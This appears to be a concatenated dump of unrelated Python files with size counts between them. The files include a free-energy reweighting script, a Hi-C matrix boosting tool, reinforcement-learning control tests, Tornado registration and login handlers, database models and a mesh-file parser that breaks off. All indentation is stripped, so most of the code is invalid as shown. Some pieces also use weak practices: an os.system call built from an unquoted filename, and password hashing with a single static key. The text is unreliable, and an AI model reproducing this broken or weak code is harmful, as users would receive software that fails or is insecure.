p_i=np.exp(-f_i-logsumexp(-f_i))
f_ = open('p_i_eq_1_'+str(mag_nbins)+'_'+str(T_targets[j])+'_'+str(N_)+'.txt', 'w')
print("PMF with mu_eq_1 (in units of kT)", file=f_)
print("%8s %6s %8s %10s" % ('bin', 'mass', 'N', 'p'), file=f_)
for i in range(nbins):
print('%8d %10.8g %8d %16.16e' % (i, bin_centers[i], bin_counts[i], p_i[i]), file=f_)
f_.close()
# Now do it such that areas under peaks are the same
def free_diff_comp_area(mu, f_i_base, nbins, bin_centers, beta_reweight):
f_i = f_i_base - beta_reweight*mu*bin_centers
p_i=np.exp(-f_i-logsumexp(-f_i))
# Determine mid_comp
# Filter f_i to determine where to divide peak
f_i_filter = savgol_filter(f_i, window_length=41, polyorder=3)
f_i_filter_2 = savgol_filter(f_i_filter, window_length=41, polyorder=3)
rel_max = signal.argrelmax(f_i_filter_2, order=10)
# print rel_max
npeak = nbins//2
if(len(rel_max[0]) == 0):
npeak = nbins//2
else:
npeak = signal.argrelmax(f_i_filter_2, order=10)[0].max()
# As bin size is equal for now, can just do naive sum as equivalent to
# midpoint rule barring a constant factor
low_area = np.trapz(p_i[0:npeak], x = bin_centers[0:npeak])
high_area = np.trapz(p_i[npeak:nbins], x = bin_centers[npeak:nbins])
return high_area-low_area
print("", file=f_bs)
print("Finding mu_eq_2", file=f_bs)
# Find minimum
mu_eq_2 = brentq(free_diff_comp_area, a=mu_eq_1-0.05, b=mu_high+0.05, args=(f_i_base, nbins, np.array(bin_centers), beta_reweight))
mu_2_storage[j] = mu_eq_2
print("mu_eq_2 %17.17e"%(mu_eq_2), file=f_bs)
print("", file=f_bs)
# Now output results
# Reweight to mu_eq
f_i = f_i_base.copy()
f_i = f_i - beta_reweight*mu_eq_2*np.array(bin_centers)
f_i -= f_i.min()
# Show free energy and uncertainty of each occupied bin relative to lowest free energy
print("1D PMF with mu_eq_2", file=f_bs)
print("", file=f_bs)
print("%8s %6s %8s %10s %10s" % ('bin', 'mass', 'N', 'f', 'df'), file=f_bs)
for i in range(nbins):
print('%8d %10.8g %8d %10.8e %10.8e' % (i, bin_centers[i], bin_counts[i], f_i[i], df_i[i]), file=f_bs)
f_ = open('mu_eq_2_'+str(mag_nbins)+'_'+str(T_targets[j])+'_'+str(N_)+'.txt', 'w')
print("%17.17e"%(mu_eq_2), file=f_)
f_.close()
# Write out PMF to file
f_ = open('pmf_eq_2_'+str(mag_nbins)+'_'+str(T_targets[j])+'_'+str(N_)+'.txt', 'w')
print("PMF with mu_eq_2 (in units of kT)", file=f_)
print("%8s %6s %8s %10s %10s" % ('bin', 'mass', 'N', 'f', 'df'), file=f_)
for i in range(nbins):
print('%8d %10.8g %8d %16.16e %16.16e' % (i, bin_centers[i], bin_counts[i], f_i[i], df_i[i]), file=f_)
f_.close()
# Get compositions
p_i=np.exp(-f_i-logsumexp(-f_i))
f_ = open('p_i_eq_2_'+str(mag_nbins)+'_'+str(T_targets[j])+'_'+str(N_)+'.txt', 'w')
print("PMF with mu_eq_1 (in units of kT)", file=f_)
print("%8s %6s %8s %10s" % ('bin', 'mass', 'N', 'p'), file=f_)
for i in range(nbins):
print('%8d %10.8g %8d %16.16e' % (i, bin_centers[i], bin_counts[i], p_i[i]), file=f_)
f_.close()
# Determine mid_comp
f_i_filter = savgol_filter(f_i, window_length=41, polyorder=3)
f_i_filter_2 = savgol_filter(f_i_filter, window_length=41, polyorder=3)
rel_max = signal.argrelmax(f_i_filter_2, order=10)
npeak = nbins//2
if(len(rel_max[0]) == 0):
npeak = nbins//2
print('Weird divergence at %8d' % (j), file=f_bs)
else:
npeak = signal.argrelmax(f_i_filter_2, order=10)[0].max()
bin_centers_np = np.array(bin_centers)
p_i_mass = bin_centers_np*p_i
mass_avg = p_i_mass.sum()
bin_closest = np.abs(bin_centers-mass_avg)
print("mass_avg %17.17e"%(mass_avg))
# Now get entry that is closest to value
mid_comp = np.argmin(bin_closest)
mid_comp = npeak
# Take
low_comp = p_i_mass[0:mid_comp].sum()/p_i[0:mid_comp].sum()
high_comp = p_i_mass[mid_comp:nbins].sum()/p_i[mid_comp:nbins].sum()
print(low_comp, high_comp, T_targets[j])
low_comp_storage[j] = low_comp/1575.0
high_comp_storage[j] = high_comp/1575.0
f_ = open('composition_reweight_'+str(N_)+'.txt', 'w')
print('T phi_low phi_high', end=' ', file=f_)
print("%10s %10s %10s" % ('T', 'phi_low', 'phi_high'), file=f_)
for i in range(len(T_targets)):
print('%16.16e %16.16e %16.16e' % (T_targets[i], low_comp_storage[i], high_comp_storage[i]), file=f_)
f_.close()
f_ = open('mu_reweight'+str(N_)+'.txt', 'w')
print("%10s %10s %10s" % ('T', 'mu_peaks', 'mu_area'), file=f_)
for i in range(len(T_targets)):
print('%16.16e %16.16e %16.16e' % (T_targets[i], mu_1_storage[i], mu_2_storage[i]), file=f_)
f_.close()
f_bs.close()
| 18,195 | 7,244 |
texts = {
"browse":"🗂️ Browse categories",
"orders":"📥 My orders",
"cart":"🛒 My cart",
"settings":"⚙ Settings",
"contact":"📞 Contact us",
"home":"🏠 Home",
"contact1":"{Store_name} - {store_phone}",
} | 241 | 102 |
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/nedbat/django_coverage_plugin/blob/master/NOTICE.txt
"""Django Template Coverage Plugin"""
from .plugin import DjangoTemplatePluginException # noqa
from .plugin import DjangoTemplatePlugin
def coverage_init(reg, options):
reg.add_file_tracer(DjangoTemplatePlugin(options))
| 396 | 123 |
#!/usr/bin/env python2
# Copyright 2015 Dejan D. M. Milosavljevic
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import platform
import os
import nucleotide
import nucleotide.component
import nucleotide.component.windows
import nucleotide.component.windows._common
import nucleotide.component.windows._common.translator
import nucleotide.component.windows.mingw
import nucleotide.component.windows.mingw.translator
import nucleotide.component.windows.msvc
import nucleotide.component.windows.msvc.translator
import nucleotide.component.windows.cygwingcc
import nucleotide.component.windows.cygwingcc.translator
## Detect MinGW on Windows
class Translator:
m_list = []
def __init__(self):
self.m_list = []
if( False == Translator._detect() ):
return
I__common = nucleotide.component.windows._common.translator.Translator()
self.m_list += I__common.get()
I_mingw = nucleotide.component.windows.mingw.translator.Translator()
self.m_list += I_mingw.get()
if( 'Windows' == platform.system() ):
I_msvc = nucleotide.component.windows.msvc.translator.Translator()
self.m_list += I_msvc.get()
if( 'CYGWIN_NT' in platform.system() ):
I_cygwin = nucleotide.component.windows.mingw.translator.Translator()
self.m_list += I_cygwin.get()
def get(self):
return self.m_list
def check(self):
pass
@staticmethod
def extend(P_options):
if( False == Translator._detect() ):
return
nucleotide.component.windows._common.translator.Translator.extend(P_options)
nucleotide.component.windows.mingw.translator.Translator.extend(P_options)
if( 'Windows' == platform.system() ):
nucleotide.component.windows.msvc.translator.Translator.extend(P_options)
if( 'CYGWIN_NT' in platform.system() ):
nucleotide.component.windows.cygwingcc.translator.Translator.extend(P_options)
@staticmethod
def _detect():
if( 'Windows' == platform.system() ):
#print( "Platform: " + platform.system() )
return True
if( 'CYGWIN_NT' in platform.system() ):
#print( "Platform: " + platform.system() )
return True
print( "Unknown Platform: " + platform.system() )
return False
| 3,006 | 989 |
import os
import pandas as pd
import sqlite3
CSV_FILEPATH = os.path.join(os.path.dirname(__file__), "..", "data", "buddymove_holidayiq.csv")
DB_FILEPATH = os.path.join(os.path.dirname(__file__), "..", "data", "buddymove_holidayiq.db")
connection = sqlite3.connect(DB_FILEPATH)
table_name = "reviews2"
df = pd.read_csv(CSV_FILEPATH)
# assigns a column label "id" for the index column
df.index.rename("id", inplace=True)
df.index += 1 # starts ids at 1 instead of 0
print(df.head())
df.to_sql(table_name, con=connection)
cursor = connection.cursor()
cursor.execute(f"SELECT count(distinct id) as review_count FROM {table_name};")
results = cursor.fetchone()
print(results, "RECORDS")
# Other approach
# conn = sqlite3.connect("buddymove_holidayiq.sqlite3")
# data.to_sql('review', conn, if_exists = 'replace')
# curs = conn.cursor()
# query = "SELECT * FROM review"
# results = curs.execute(query).fetchall()
# print("There are", len(results), "rows")
# ----------------------------------------
# (Stretch) What are the average number of reviews for each category?
conn = sqlite3.connect("buddymove_holidayiq.sqlite3")
curs = conn.cursor()
categories = ['Sports', 'Religious', 'Nature', 'Theatre', 'Shopping', 'Picnic']
query = "SELECT * FROM review"
length = len(curs.execute(query).fetchall())
for item in categories:
query = f"SELECT SUM({item}) FROM review"
results = curs.execute(query).fetchall()
print(f'Average number of reviews for {item} column:', round(results[0][0]/length))
| 1,511 | 523 |
from .. import ActionsNode
from ..visitor import Visitor
class SimilarActionsCompacter(Visitor):
def _visit_actions_node(self, node, replacements):
"""
:param node:
:type node: ActionsNode
:return:
"""
compact_successors = replacements[node.successor]
#import ipdb
#ipdb.set_trace()
assert len(compact_successors) < 2, "The {} visitor returned more than one successor for an ActionNode, this is" \
"not allowed. Got: {}".format(self, compact_successors)
compact_successor = compact_successors[0]
if isinstance(compact_successor, ActionsNode) and compact_successor.get_action_type() == node.get_action_type():
node.actions_info = node.actions_info + compact_successor.actions_info
node.successor = compact_successor.successor
else:
node.successor = compact_successor
return [node]
| 971 | 269 |
#!/usr/bin/python3 -u
import argparse
import logging
import os
import h5py
import numpy as np
import pandas as pd
import sys
# my own toolkit
import HiCutils
import convert
import utils
DEFAULT_OUTPUT_FOLDER = './boosted/'
logging.basicConfig(level=logging.DEBUG)
logging.getLogger("").setLevel(logging.INFO)
logger = logging.getLogger(f'Boos-HiC')
p = argparse.ArgumentParser()
p.add_argument("operation", default="boost", choices=["boost", "sample"],
help="Operation to be executed")
p.add_argument("-m", "--matrixfilename", required=True,
help="contact map stored in tab separated file as : "
"bin_i / bin_j / counts_ij Only no zero values are stored. Contact map are symmetric. "
"Alternatively, you can provide a cooler format file (.cool), in this case no --bedfilename is needed.")
p.add_argument("-b", "--bedfilename", help="bed file of genomic coordinate of each bin")
p.add_argument("-c", "--chromosomes", nargs='+', help="Which chromosomes to boost, otherwise all chromosomes")
p.add_argument("-o", "--output_prefix", default=None,
help="Prefix for output files, including the output folder. "
f"If not given, it will be in subfolder '{DEFAULT_OUTPUT_FOLDER}' plus basename of the input matrixfilename "
"without its file extension.")
p.add_argument("-f", "--format", default="cool", choices=["cool", "hdf5"], help="output file format")
p.add_argument("-g", "--genome_assembly", default="ce11", help="genome assembly as metadata for .cool file")
p.add_argument("-k", "--keep_filtered_bins", action='store_true',
help="Whether to keep filtered out bins, otherwise they will be removed from the result matrix. "
"Not used yet.")
p.add_argument("-a", "--alpha", default=0.24, type=float,
help="AFTER a lot of test : 0.24 is always a good and safe compromise, you must use this value")
args = p.parse_args(sys.argv[1:])
# input file
Operation = args.operation
bedfilename = args.bedfilename
matrixfilename = args.matrixfilename
chromosomes = args.chromosomes
format = args.format
keep_filtered_bins = args.keep_filtered_bins
genome_assembly = args.genome_assembly
alpha = args.alpha
if args.output_prefix:
output_prefix = args.output_prefix
else:
if not os.path.exists(DEFAULT_OUTPUT_FOLDER):
os.mkdir(DEFAULT_OUTPUT_FOLDER)
output_prefix = DEFAULT_OUTPUT_FOLDER + os.path.splitext(os.path.basename(matrixfilename))[0]
# alternative in the same folder of the input matrix
# output_prefix = os.path.splitext(matrixfilename)[0]
###
def BoostHiC(amat):
normmat = HiCutils.SCN(np.copy(amat))
ff_normmat = HiCutils.fastFloyd(1 / np.power(np.copy(normmat), alpha))
FFmat = np.power(ff_normmat, -1 / alpha) # to dist, FF, to contact in one line
boostedmat = HiCutils.adjustPdS(normmat, FFmat)
return boostedmat
def Sample(amat, repositoryout):
percentofsample = [0.1, 1., 10.]
for j in percentofsample:
logger.info(f"Value of sample: {j}")
chrmat_s = np.copy(amat)
chrmat = HiCutils.downsample_basic(chrmat_s, j)
fh5 = h5py.File(repositoryout + "inputmat_sampleat_" + str(j) + "_percent.hdf5", "w")
fh5['data'] = chrmat
fh5.close()
# ## CODE EXECUTION ## #
# load the data
logger.info("LOADING MATRIX")
if matrixfilename.endswith('.cool'):
D, total, resolution, D_cooler = convert.loadabsdatafile_cool(matrixfilename)
else:
D, total, resolution = convert.loadabsdatafile(bedfilename)
D_cooler = None
print(*D.items(), sep='\n')
print(f'Total bins:{total} resolution:{resolution}')
bins_boosted = pd.DataFrame(columns=['chrom', 'start', 'end'])
pixels_boosted = pd.DataFrame(columns=['bin1_id', 'bin2_id', 'count'])
chroms = chromosomes if chromosomes else D.keys()
bin_offs = 0
for chrom in chroms:
repositoryout = f'{output_prefix}_{chrom}_'
if D_cooler:
basemat = D_cooler.matrix(balance=False).fetch(chrom)
else:
beginfend = D[chrom][0]
endfend = D[chrom][1]
logger.info(f"Chromosome {chrom} data fend : {beginfend},{endfend}")
basemat = convert.loadmatrixselected(matrixfilename, beginfend, endfend)
# matrix filtering
logger.info("FILTERING")
bins_num = basemat.shape[0]
pos_out = HiCutils.get_outliers(basemat)
utils.savematrixasfilelist3(pos_out, repositoryout + "filteredbin.txt")
basematfilter = basemat[np.ix_(~pos_out, ~pos_out)]
basematfilter = np.copy(basematfilter)
# basematfilter=basematfilter[0:1000,0:1000]
logger.info(f'len(basemat):{len(basemat)}, len(basematfilter):{len(basematfilter)}')
if format is None or format == "hdf5":
fh5 = h5py.File(repositoryout + "inputmat.hdf5", "w")
fh5['data'] = basemat
fh5.close()
if format is None or format == "cool":
convert.hic_to_cool(basemat, chrom, resolution, repositoryout + "inputmat.cool",
genome_assembly=genome_assembly)
if format is None or format == "hdf5":
fh5 = h5py.File(repositoryout + "inputmat_filtered.hdf5", "w")
fh5['data'] = basematfilter
fh5.close()
if format is None or format == "cool":
convert.hic_to_cool(basematfilter, chrom, resolution, repositoryout + "inputmat_filtered.cool",
genome_assembly=genome_assembly)
if Operation == "boost":
logger.info("Boost Hic")
boosted = BoostHiC(basematfilter)
# save
if format is None or format == "hdf5":
fh5 = h5py.File(repositoryout + "boostedmat.hdf5", "w")
fh5['data'] = boosted
fh5.close()
if format is None or format == "cool":
filtered_bins = pos_out if keep_filtered_bins else None
chrom_bins, chrom_pixels = convert.get_bins_pixels(boosted, chrom, resolution,
bin_offs=bin_offs, bins_num=bins_num,
filtered_bins=filtered_bins)
# save as cool
cool_file = f"{repositoryout}boosted.cool"
convert.create_cool(chrom_bins, chrom_pixels, resolution, cool_file, genome_assembly=genome_assembly)
# collecting all boosted chromosomes in one
bins_boosted = pd.concat([bins_boosted, chrom_bins])
pixels_boosted = pd.concat([pixels_boosted, chrom_pixels])
bin_offs += bins_num
elif Operation == "sample":
logger.info("SAMPLING")
Sample(basematfilter, repositoryout)
if Operation == "boost" and format is None or format == "cool": # combined file support only for .cool
repositoryout = output_prefix + (f'_{"_".join(chromosomes)}_' if chromosomes else '_')
cool_file = f"{repositoryout}boosted{'_kfb' if keep_filtered_bins else ''}.cool"
convert.create_cool(bins_boosted, pixels_boosted, resolution, cool_file, genome_assembly=genome_assembly)
cmd = f'cooler balance --cis-only --force {cool_file}'
logger.info(f'CALL: {cmd}')
os.system(cmd)
resolutions = [5000, 10000, 20000, 50000, 100000, 200000, 500000, 1000000]
resolutions_str = ','.join([str(r) for r in resolutions])
cmd = f'cooler zoomify -r "{resolutions_str}" {cool_file}'
logger.info(f'CALL: {cmd}')
os.system(cmd)
| 7,416 | 2,497 |
import gym
from ilqr import iLQR
import numpy as np
import pytest
from aprl.agents.monte_carlo import (
MonteCarloParallel,
MonteCarloSingle,
MujocoResettableWrapper,
receding_horizon,
)
from aprl.agents.mujoco_lqr import (
MujocoFiniteDiffCost,
MujocoFiniteDiffDynamicsBasic,
MujocoFiniteDiffDynamicsPerformance,
)
dynamics_list = [MujocoFiniteDiffDynamicsBasic, MujocoFiniteDiffDynamicsPerformance]
@pytest.mark.parametrize("dynamics_cls", dynamics_list)
def test_lqr_mujoco(dynamics_cls):
"""Smoke test for MujcooFiniteDiff{Dynamics,Cost}.
Jupyter notebook experiments/mujoco_control.ipynb has quantitative results
attained; for efficiency, we only run for a few iterations here."""
env = gym.make("Reacher-v2").unwrapped
env.seed(42)
env.reset()
dynamics = dynamics_cls(env)
cost = MujocoFiniteDiffCost(env)
N = 10
ilqr = iLQR(dynamics, cost, N)
x0 = dynamics.get_state()
us_init = np.array([env.action_space.sample() for _ in range(N)])
xs, us = ilqr.fit(x0, us_init, n_iterations=3)
assert x0.shape == xs[0].shape
assert xs.shape[0] == N + 1
assert us.shape == (N, 2)
assert env.action_space.contains(us[0])
def rollout(env, actions):
obs, rews, dones, infos = [], [], [], []
for a in actions:
ob, rew, done, info = env.step(a)
obs.append(ob)
rews.append(rew)
dones.append(done)
infos.append(info)
obs = np.array(obs)
rews = np.array(rews)
dones = np.array(dones)
return obs, rews, dones, infos
def make_mujoco_env(env_name, seed):
env = gym.make(env_name)
env = MujocoResettableWrapper(env.unwrapped)
env.seed(seed)
env.reset()
return env
MONTE_CARLO_ENVS = ["Reacher-v2", "HalfCheetah-v2", "Hopper-v2"]
@pytest.mark.parametrize("env_name", MONTE_CARLO_ENVS)
def test_mujoco_reset_env(env_name, horizon=10, seed=42):
env = make_mujoco_env(env_name, seed)
state = env.get_state()
actions = [env.action_space.sample() for _ in range(horizon)]
first_obs, first_rews, first_dones, _first_infos = rollout(env, actions)
env.set_state(state)
second_obs, second_rews, second_dones, _second_infos = rollout(env, actions)
np.testing.assert_almost_equal(second_obs, first_obs, decimal=5)
np.testing.assert_almost_equal(second_rews, first_rews, decimal=5)
assert (first_dones == second_dones).all()
def check_monte_carlo(
kind, score_thresholds, total_horizon, planning_horizon, trajectories, seed=42
):
def f(env_name):
# Setup
env = make_mujoco_env(env_name, seed)
if kind == "single":
mc = MonteCarloSingle(env, planning_horizon, trajectories)
elif kind == "parallel":
env_fns = [lambda: make_mujoco_env(env_name, seed) for _ in range(2)]
mc = MonteCarloParallel(env_fns, planning_horizon, trajectories)
else: # pragma: no cover
raise ValueError("Unrecognized kind '{}'".format(kind))
mc.seed(seed)
# Check for side-effects
state = env.get_state()
_ = mc.best_action(state)
assert (env.get_state() == state).all(), "Monte Carlo search has side effects"
# One receding horizon rollout of Monte Carlo search
total_rew = 0
prev_done = False
for i, (a, ob, rew, done, info) in enumerate(receding_horizon(mc, env)):
assert not prev_done, "should terminate if env returns done"
prev_done = done
assert env.action_space.contains(a)
assert env.observation_space.contains(ob)
total_rew += rew
if i >= total_horizon:
break
assert i == total_horizon or done
# Check it does better than random sequences
random_rews = []
for i in range(10):
env.action_space.np_random.seed(seed + i)
action_seq = [env.action_space.sample() for _ in range(total_horizon)]
env.set_state(state)
_, rews, _, _ = rollout(env, action_seq)
random_rew = sum(rews)
random_rews.append(random_rew)
assert total_rew >= random_rew, "random sequence {}".format(i)
print(
f"Random actions on {env_name} for {total_horizon} obtains "
f"mean {np.mean(random_rews)} s.d. {np.std(random_rews)}"
)
# Check against pre-defined score threshold
assert total_rew >= score_thresholds[env_name]
# Cleanup
if kind == "parallel":
mc.close()
with pytest.raises(BrokenPipeError):
mc.best_action(state)
return f
MC_SINGLE_THRESHOLDS = {
"Reacher-v2": -11, # tested -9.5, random -17.25 s.d. 1.5
"HalfCheetah-v2": 19, # tested 21.6, random -4.2 s.d. 3.7
"Hopper-v2": 29, # tested 31.1, random 15.2 s.d. 5.9
}
MC_PARALLEL_THRESHOLDS = {
"Reacher-v2": -17, # tested at -15.3; random -25.8 s.d. 1.8
"HalfCheetah-v2": 33, # tested at 35.5; random -6.0 s.d. 7.1
"Hopper-v2": 52, # tested at 54.7; random 21.1 s.d. 13.2
}
_test_mc_single = check_monte_carlo(
"single", MC_SINGLE_THRESHOLDS, total_horizon=20, planning_horizon=10, trajectories=100
)
_test_mc_parallel = check_monte_carlo(
"parallel", MC_PARALLEL_THRESHOLDS, total_horizon=30, planning_horizon=15, trajectories=200
)
test_mc_single = pytest.mark.parametrize("env_name", MONTE_CARLO_ENVS)(_test_mc_single)
test_mc_parallel = pytest.mark.parametrize("env_name", MONTE_CARLO_ENVS)(_test_mc_parallel)
| 5,560 | 2,092 |
# -*- coding: utf-8 -*-
# @Time : 20-4-13 下午4:40
# @File : handlers.py
import logging
import re
import hashlib
import config
from utils.response_code import RET
from utils.session import Session
from basehandler import BaseHandler
class RegisterHandler(BaseHandler):
def post(self, *args, **kwargs):
# 获取前端传递过来的JSON数据,并将其提取出来
mobile = self.json_args.get('mobile')
smsCode = self.json_args.get('phoneCode')
password = self.json_args.get('password')
password2 = self.json_args.get('password2')
# 判断传递过来的参数是否为空
if not all((mobile, smsCode, password, password2)):
return self.write(dict(errorcode=RET.NODATA, errormsg='参数不完整'))
# 判断手机号输入格式是否正确
if not re.match(r"^1\d{10}$", mobile):
return self.write(dict(errorcode=RET.NODATA, errormsg='输入手机号码不正确'))
# 判断两次输入的密码是否相同
if password != password2:
return self.write(dict(errorcode=RET.PARAMERR, errormsg='两次输入密码不一致'))
# # 判断手机验证码是否正确
# try:
# real_sms_code = self.redis.get('sms_code_%s' % mobile)
# except Exception as e:
# logging.error(e)
# return self.write(dict(errorcode=RET.DBERR, errormsg='查询短信验证码出错'))
# # 判断短信验证码是否过期
# if not real_sms_code:
# return self.write(dict(errorcode=RET.DBERR, errormsg='短信验证码过期'))
# # 对比用户填写的验证码与真实值
# if smsCode != real_sms_code:
# return self.write(dict(errorcode=RET.DATAERR, errormsg='短信验证码输入有误'))
# # 删除掉存储在Redis中的短信验证码
# try:
# self.redis.delete('sms_code_%s' % mobile)
# except Exception as e:
# logging.error(e)
# 保存数据,同时判断手机号是否存在,判断的依据是数据库中mobile字段的唯一约束
password = hashlib.sha256(password + config.passwd_hash_key).hexdigest()
sql_str = "insert into ih_user_profile(up_name, up_mobile, up_passwd) values (%(name)s, %(mobile)s, %(passwd)s);"
try:
user_id = self.db.execute(sql_str, name=mobile, mobile=mobile, passwd=password)
except Exception as e:
logging.error(e)
return self.write(dict(errorcode=RET.DBERR, errormsg='手机号码已被注册'))
# 用session记录用户的登录状态
session = Session(self)
session.data['user_id'] = user_id
session.data['mobile'] = mobile
session.data['name'] = mobile
try:
session.save()
except Exception as e:
logging.error(e)
return self.write(dict(errorcode=RET.OK, errormsg='注册成功'))
class LoginHandler(BaseHandler):
def post(self, *args, **kwargs):
# 获取前端传递过来的JSON数据,并将其提取出来
mobile = self.json_args.get('mobile')
password = self.json_args.get('password')
# 检查参数
if not all([mobile, password]):
return self.write(dict(errorcode=RET.PARAMERR, errormsg="参数错误"))
if not re.match(r"^1\d{10}$", mobile):
return self.write(dict(errorcode=RET.DATAERR, errormsg="手机号错误"))
# 检查秘密是否正确
res = self.db.get("select up_user_id,up_name,up_passwd from ih_user_profile where up_mobile=%(mobile)s",
mobile=mobile)
password = hashlib.sha256(password + config.passwd_hash_key).hexdigest()
if res and res["up_passwd"] == unicode(password):
# 生成session数据
# 返回客户端
try:
self.session = Session(self)
self.session.data['user_id'] = res['up_user_id']
self.session.data['name'] = res['up_name']
self.session.data['mobile'] = mobile
self.session.save()
except Exception as e:
logging.error(e)
return self.write(dict(errorcode=RET.OK, errormsg="OK"))
else:
return self.write(dict(errorcode=RET.DATAERR, errormsg="手机号或密码错误!"))
class CheckLoginHandler(BaseHandler):
def get(self, *args, **kwargs):
# 如果返回真,则说明data中有数据
if self.get_current_user():
return self.write(dict(errorcode=RET.OK, errormsg="true", data={"name":self.session.data['name']}))
else:
return self.write(dict(errorcode=RET.USERERR, errormsg="false"))
| 4,219 | 1,636 |
from .gen.custom_field_settings import _CustomFieldSettings
class CustomFieldSettings(_CustomFieldSettings):
"""Custom Field Settings resource"""
def find_by_project(self, project, params={}, **options):
"""Returns a list of all of the custom fields settings on a project.
Parameters
----------
project : {Gid} The ID of the project for which to list custom field settings
[params] : {Object} Parameters for the request
"""
path = "/projects/%s/custom_field_settings" % (project)
return self.client.get_collection(path, params, **options)
def find_by_portfolio(self, portfolio, params={}, **options):
"""Returns a list of all of the custom fields settings on a portfolio.
Parameters
----------
portfolio : {Gid} The ID of the portfolio for which to list custom field settings
[params] : {Object} Parameters for the request
"""
path = "/portfolios/%s/custom_field_settings" % (portfolio)
return self.client.get_collection(path, params, **options)
| 1,091 | 289 |
from google.appengine.ext import ndb
from .character import Character
from .utils import paginated_query
class Faction(ndb.Model):
name = ndb.StringProperty(required=True)
description = ndb.TextProperty()
created = ndb.DateTimeProperty(required=True, auto_now_add=True)
updated = ndb.DateTimeProperty(required=True, auto_now=True)
@classmethod
def get_factions(cls, **kwargs):
"Return all factions in alphabetical order."
q = cls.query()
q_forward = q.order(cls.name)
q_backward = q.order(-cls.name)
return paginated_query(q_forward, q_backward, **kwargs)
def get_characters(self, **kwargs):
"Return characters in faction in alphabetical order."
q = Character.query(Character.faction_key == self.key)
q_forward = q.order(Character.name)
q_backward = q.order(-Character.name)
return paginated_query(q_forward, q_backward, **kwargs)
@classmethod
def get_by_name(cls, name):
return cls.query(cls.name == name).get_async()
| 1,049 | 335 |
# Copyright 2013 by Rackspace Hosting, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def header_property(wsgi_name):
"""Creates a read-only header property.
Args:
wsgi_name (str): Case-sensitive name of the header as it would
appear in the WSGI environ dict (i.e., 'HTTP_*')
Returns:
A property instance than can be assigned to a class variable.
"""
def fget(self):
try:
return self.env[wsgi_name] or None
except KeyError:
return None
return property(fget)
class Body(object):
"""Wrap wsgi.input streams to make them more robust.
The socket._fileobject and io.BufferedReader are sometimes used
to implement wsgi.input. However, app developers are often burned
by the fact that the read() method for these objects block
indefinitely if either no size is passed, or a size greater than
the request's content length is passed to the method.
This class normalizes wsgi.input behavior between WSGI servers
by implementing non-blocking behavior for the cases mentioned
above.
Args:
stream: Instance of socket._fileobject from environ['wsgi.input']
stream_len: Expected content length of the stream.
"""
def __init__(self, stream, stream_len):
self.stream = stream
self.stream_len = stream_len
def __iter__(self):
return self
def __next__(self):
return next(self.stream)
next = __next__
def _read(self, size, target):
"""Helper function for proxing reads to the underlying stream.
Args:
size (int): Maximum number of bytes/characters to read.
Will be coerced, if None or -1, to `self.stream_len`. Will
likewise be coerced if greater than `self.stream_len`, so
that if the stream doesn't follow standard io semantics,
the read won't block.
target (callable): Once `size` has been fixed up, this function
will be called to actually do the work.
Returns:
Data read from the stream, as returned by `target`.
"""
if size is None or size == -1 or size > self.stream_len:
size = self.stream_len
return target(size)
def read(self, size=None):
"""Read from the stream.
Args:
size (int): Maximum number of bytes/characters to read.
Defaults to reading until EOF.
Returns:
Data read from the stream.
"""
return self._read(size, self.stream.read)
def readline(self, limit=None):
"""Read a line from the stream.
Args:
limit (int): Maximum number of bytes/characters to read.
Defaults to reading until EOF.
Returns:
Data read from the stream.
"""
return self._read(limit, self.stream.readline)
def readlines(self, hint=None):
"""Read lines from the stream.
Args:
hint (int): Maximum number of bytes/characters to read.
Defaults to reading until EOF.
Returns:
Data read from the stream.
"""
return self._read(hint, self.stream.readlines)
| 3,790 | 1,037 |
"""
Gmsh format 2.2
"""
import numpy as np
from flow import Flow
from element import Element
from element_search import find_neighbors
from text.text_flow import write_flow
from text.text_elements import write_elements
from text.text_geometries import write_geometries
#==============================================================================
def intIt(l):
return np.array([int(e) for e in l])
def floatIt(l):
return np.array([float(e) for e in l])
def extract_msh(path_msh):
f = open(path_msh, 'r')
nodes_X, nodes_Y = [], []
elements = []
line = f.readline()
# ...
# $Nodes\n
# n_nodes
# ...
while line != '$Nodes\n':
line = f.readline()
line = f.readline()
n_nodes = int(line.strip())
for i in range(n_nodes):
# line = id x y z
line = f.readline()
coord = floatIt(line.strip().split())
nodes_X.append(coord[1])
nodes_Y.append(coord[2])
# ...
# $Elements\n
# n_elements
# ...
while line != '$Elements\n':
line = f.readline()
line = f.readline()
n_elements = int(line.strip())
count = 0
for i in range(n_elements):
# element_id element_type ... ... nodes_id
line = f.readline()
coord = intIt(line.strip().split())
element_type = coord[1]
if element_type == 9: # 6-node second order triangle
count += 1
e = Element(count)
e.nodes = np.array(coord[-6:])
elements.append(e)
# if element_type == 1: # 2-node line
# e.element_type = 1
# e.nodes = coord[-2:]
#
# elif element_type == 2: # 3-node triangle
# e.element_type = 2
# e.nodes = coord[-3:]
#
# elif element_type == 3: # 4-node quadrangle
# e.element_type = 3
# e.nodes = coord[-4:]
#
# elif element_type == 8: # 3-node second order line
# e.element_type = 8
# e.nodes = coord[-3:]
#
# elif element_type == 9: # 6-node second order triangle
# e.element_type = 9
# e.nodes = coord[-6:]
#
# elif element_type == 10: # 9-node second order quadrangle
# e.element_type = 10
# e.nodes = coord[-9:]
#
# elif element_type == 15: # 1-node point
# e.element_type = 15
# e.nodes = coord[-1:]
#
# elements.append(e)
f.close()
return np.array(nodes_X), np.array(nodes_Y), np.array(elements)
def generate_poiseuille(path_msh, parent_folder):
single_nodes_X, single_nodes_Y, elements = extract_msh(path_msh)
d = np.max(single_nodes_Y) - np.min(single_nodes_Y)
y_middle = np.min(single_nodes_Y) + d/2
n_nodes = len(single_nodes_X)
mu = 1e-3
p = 2*mu*single_nodes_X
U = d**2/4 - (single_nodes_Y - y_middle)**2
V = np.zeros(n_nodes)
